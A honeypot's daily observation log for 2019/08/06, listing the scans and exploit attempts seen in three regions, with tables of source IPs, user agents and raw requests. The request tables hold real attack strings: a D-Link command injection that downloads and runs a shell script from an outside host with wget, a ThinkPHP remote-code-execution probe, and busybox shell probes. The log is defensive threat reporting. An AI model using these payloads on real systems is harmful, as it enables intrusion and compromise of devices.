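This is the Honeypot (provisional) observation log for 2019/08/06.
In AP, the following were observed:
Access targeting a D-Link vulnerability
Access targeting an OpenDreamBox vulnerability
Scanning for phpMyAdmin
Scanning by Hakai/2.0
Scanning by Jorgee
Scanning by ZmEu
Malicious traffic involving 5[.]188[.]210[.]101
In US, the following were observed:
Access targeting a ThinkPHP vulnerability
Malicious traffic involving 110[.]249[.]212[.]46
Malicious traffic involving 5[.]188[.]210[.]101
Gh0st\xad access
In EU, the following were observed:
Scanning for phpMyAdmin
Scanning by ZmEu
Malicious traffic involving 110[.]249[.]212[.]46
Gh0st\xad access
Access count trend
AP: total accesses: 125 (change from previous day: -363)
US: total accesses: 20 (change from previous day: +2)
EU: total accesses: 43 (change from previous day: +30)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.
Region:AP
Source IP addresses
Count | Source IP address | Country |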
---|---|---|
2 | 103.74.54.107 | India |
1 | 106.13.6.61 | China |
9 | 106.51.37.22 | India |
2 | 109.206.178.16 | Netherlands |
1 | 125.64.94.211 | China |
2 | 134.209.221.113 | United States |
9 | 139.59.145.209 | Germany |
2 | 142.93.150.96 | Canada |
2 | 153.126.166.53 | Japan |
2 | 160.16.127.253 | Japan |
2 | 167.71.69.220 | United States |
1 | 172.104.242.173 | United States |
9 | 187.188.145.38 | Mexico |
9 | 193.253.180.84 | France |
2 | 195.110.58.156 | United Kingdom |
3 | 195.154.86.34 | France |
2 | 206.81.6.222 | United States |
3 | 213.128.88.99 | Turkey |
2 | 213.6.16.226 | Palestine |
9 | 217.210.75.56 | Sweden |
2 | 45.67.219.18 | United States |
2 | 46.101.252.21 | Germany |
9 | 51.154.159.170 | Switzerland |
1 | 5.188.210.101 | Russia |
2 | 5.196.218.182 | France |
1 | 5.254.40.66 | United States |
9 | 61.32.227.146 | South Korea |
4 | 82.193.98.230 | Ukraine |
9 | 84.14.109.227 | France |
2 | 91.121.132.158 | France |
9 | 91.47.163.233 | Germany |
1 | 96.30.129.193 | Canada |
UserAgent list
Count | UserAgent |
---|---|
2 | - |
1 | Hakai/2.0 |
1 | Mozilla/5.0 |
3 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
113 | Mozilla/5.0 Jorgee |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
3 | ZmEu |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
9 | GET | /db/ | HTTP/1.1 |
1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://142[.]93[.]64[.]50/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | HTTP/1.1 |
3 | GET | /manager/html | HTTP/1.1 |
24 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
9 | GET | /pma/ | HTTP/1.1 |
10 | GET | /PMA/ | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /webadmin/script?command=\|busybox | HTTP/1.1 |
9 | HEAD | /dbadmin/ | HTTP/1.1 |
9 | HEAD | /db/ | HTTP/1.1 |
1 | HEAD | /images/ | HTTP/1.1 |
24 | HEAD | /phpmyadmin/ | HTTP/1.1 |
9 | HEAD | /pma/ | HTTP/1.1 |
10 | HEAD | /PMA/ | HTTP/1.1 |
1 | \x16\x03\x01 | | |
Region:US
Source IP addresses
Count | Source IP address | Country |
---|---|---|
1 | 110.249.212.46 | China |
1 | 125.64.94.211 | China |
10 | 170.178.168.90 | United States |
1 | 172.104.242.173 | United States |
1 | 176.196.53.250 | Russia |
1 | 185.209.0.12 | Latvia |
1 | 5.188.210.101 | Russia |
1 | 62.45.102.33 | Netherlands |
1 | 64.121.155.96 | United States |
1 | 66.240.205.34 | United States |
1 | 85.93.20.170 | Poland |
UserAgent list
Count | UserAgent |
---|---|
6 | - |
1 | Go-http-client/1.1 |
2 | Mozilla/5.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
2 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | Gh0st\xad | | |
1 | HEAD | /images/ | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
2 | \x03 | | |
1 | \x16\x03\x01 | | |
Region:EU
Source IP addresses
Count | Source IP address | Country |
---|---|---|
4 | 110.249.212.46 | China |
34 | 142.93.224.235 | Netherlands |
1 | 172.104.242.173 | United States |
1 | 185.209.0.12 | Latvia |
1 | 185.53.88.40 | Estonia |
1 | 66.240.205.34 | United States |
1 | 85.93.20.170 | Poland |
UserAgent list
Count | UserAgent |
---|---|
9 | - |
34 | ZmEu |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
1 | GET | /admincooptel/phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /admin/phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /admin/scripts/setup.php | HTTP/1.1 |
1 | GET | /alt/sqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /configuracion/phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /db/scripts/setup.php | HTTP/1.1 |
4 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /mysqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /mysql/scripts/setup.php | HTTP/1.1 |
1 | GET | /MySQL/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin-2.8.0.4/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin2/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin.box25/scripts/setup.php | HTTP/1.1 |
1 | GET | /php-my-admin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /_phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pHpMyAdMiN/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php/index.php | HTTP/1.1 |
1 | GET | /phpMyAdmin-www072510/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmy/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmy/scripts/setup.php\ | HTTP/1.1 |
1 | GET | /php/phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /php/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /PMA/scripts/setup.php | HTTP/1.1 |
1 | GET | /pyaniste/mysqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /~riba/pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /scripts/setup.php | HTTP/1.1 |
1 | GET | /sqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /web/phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /websql/scripts/setup.php | HTTP/1.1 |
1 | Gh0st\xad | | |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | \x03 | | |